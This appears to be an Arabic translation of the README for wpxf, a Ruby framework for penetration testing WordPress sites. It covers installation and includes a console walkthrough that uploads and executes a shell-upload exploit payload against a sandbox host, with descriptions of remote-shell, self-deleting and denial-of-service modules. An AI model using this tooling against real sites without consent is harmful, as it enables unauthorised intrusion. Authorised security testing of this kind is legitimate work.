
إطار عمل روبي مصمم للمساعدة في اختبار اختراق أنظمة ووردبريس.

إطار عمل بلغة روبي مصمم للمساعدة في اختبار الاختراق لأنظمة ووردبريس.
لتثبيت أحدث إصدار ثابت، قم بتشغيل gem install wpxf.
بعد التثبيت، يمكنك تشغيل وحدة تحكم إطار عمل استغلال ثغرات ووردبريس عن طريق تشغيل wpxf.
يلزم إصدار Ruby >= 2.4.4 لتشغيل إطار عمل استغلال ثغرات ووردبريس.
إذا واجهت مشاكل في تثبيت تبعيات WPXF (خاصة Nokogiri)، فتأكد أولاً من توفر جميع الأدوات اللازمة لتجميع امتدادات C:
sudo apt-get install build-essential patch
من المحتمل ألا تكون ملفات رؤوس التطوير الهامة مثبتة على نظامك. إليك ما يجب فعله إذا وجدت نفسك في هذه الحالة:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev
إذا كنت تواجه أخطاء تشير إلى أنه لا يمكن تحميل libcurl.dll، فستحتاج إلى التأكد من تضمين أحدث إصدار ثنائي من libcurl في مجلد Ruby bin الخاص بك، أو في أي مجلد آخر موجود في متغير PATH الخاص بالبيئة.
يمكن تنزيل أحدث إصدار من http://curl.haxx.se/download.html. اعتبارًا من 16/05/2016، تم وضع علامة على أحدث إصدار باسم Win32 2000/XP zip 7.40.0 libcurl SSL. بعد تنزيل الأرشيف، قم باستخراج محتويات مجلد bin إلى مجلد Ruby bin الخاص بك (إذا طُلب منك ذلك، لا تستبدل أي ملفات DLL موجودة).
ابدأ وحدة تحكم إطار عمل استغلال ثغرات ووردبريس عن طريق تشغيل wpxf.
بمجرد التحميل، ستظهر لك موجه wpxf، ومن هنا يمكنك البحث عن الوحدات باستخدام أمر search أو تحميل وحدة باستخدام أمر use.
تحميل وحدة في بيئتك سيسمح لك بتعيين الخيارات باستخدام أمر set وعرض معلومات حول الوحدة باستخدام info.
فيما يلي مثال لكيفية تحميل وحدة استغلال symposium_shell_upload، وتعيين خيارات الوحدة والحمولة، وتشغيل الاستغلال ضد الهدف.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
للحصول على قائمة كاملة بالأوامر المدعومة، ألق نظرة على صفحة الويكي هذه.
الوحدات المساعدة لا تسمح لك بتشغيل الحمولات على الجهاز المستهدف، بل تسمح لك باستخراج المعلومات من الهدف، أو تصعيد الصلاحيات، أو توفير وظيفة رفض الخدمة.
وحدات الاستغلال تتطلب منك تحديد حمولة يتم تنفيذها لاحقًا على الجهاز المستهدف، مما يسمح لك بتشغيل كود عشوائي لاستخراج المعلومات من الجهاز، أو إنشاء شل عن بعد، أو أي شيء آخر تريد فعله في سياق خادم الويب.
جميع هذه الحمولات، باستثناء custom وحمولات Meterpreter، ستحذف نفسها بعد تنفيذها، لتجنب تركها ملقاة على الجهاز المستهدف بعد الاستخدام أو في حالة استخدامها لإنشاء شل يفشل.
يمكن العثور على أدلة حول كتابة الوحدات والحمولات على الويكي ويمكن العثور على الوثائق الكاملة لواجهة برمجة التطبيقات (API) على https://rastating.github.io/wordpress-exploit-framework
حقوق الطبع والنشر (C) 2015-2018 rastating
قد يكون تشغيل إطار عمل استغلال ثغرات ووردبريس ضد مواقع الويب دون موافقة متبادلة مسبقة غير قانوني في بلدك. المؤلف والأطراف المشاركة في تطويره لا يتحملون أي مسؤولية ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن إطار عمل استغلال ثغرات ووردبريس.
هذا البرنامج هو برنامج مجاني: يمكنك إعادة توزيعه و/أو تعديله بموجب شروط رخصة GNU العامة كما نشرتها مؤسسة البرمجيات الحرة، إما الإصدار 3 من الترخيص أو (حسب اختيارك) أي إصدار لاحق.
يتم توزيع هذا البرنامج على أمل أن يكون مفيدًا، ولكن دون أي ضمان؛ حتى بدون الضمان الضمني للقابلية للتسويق أو الملاءمة لغرض معين. راجع رخصة GNU العامة لمزيد من التفاصيل.
يجب أن تكون قد تلقيت نسخة من رخصة GNU العامة مع هذا البرنامج. إذا لم يكن الأمر كذلك، فانظر http://www.gnu.org/licenses/.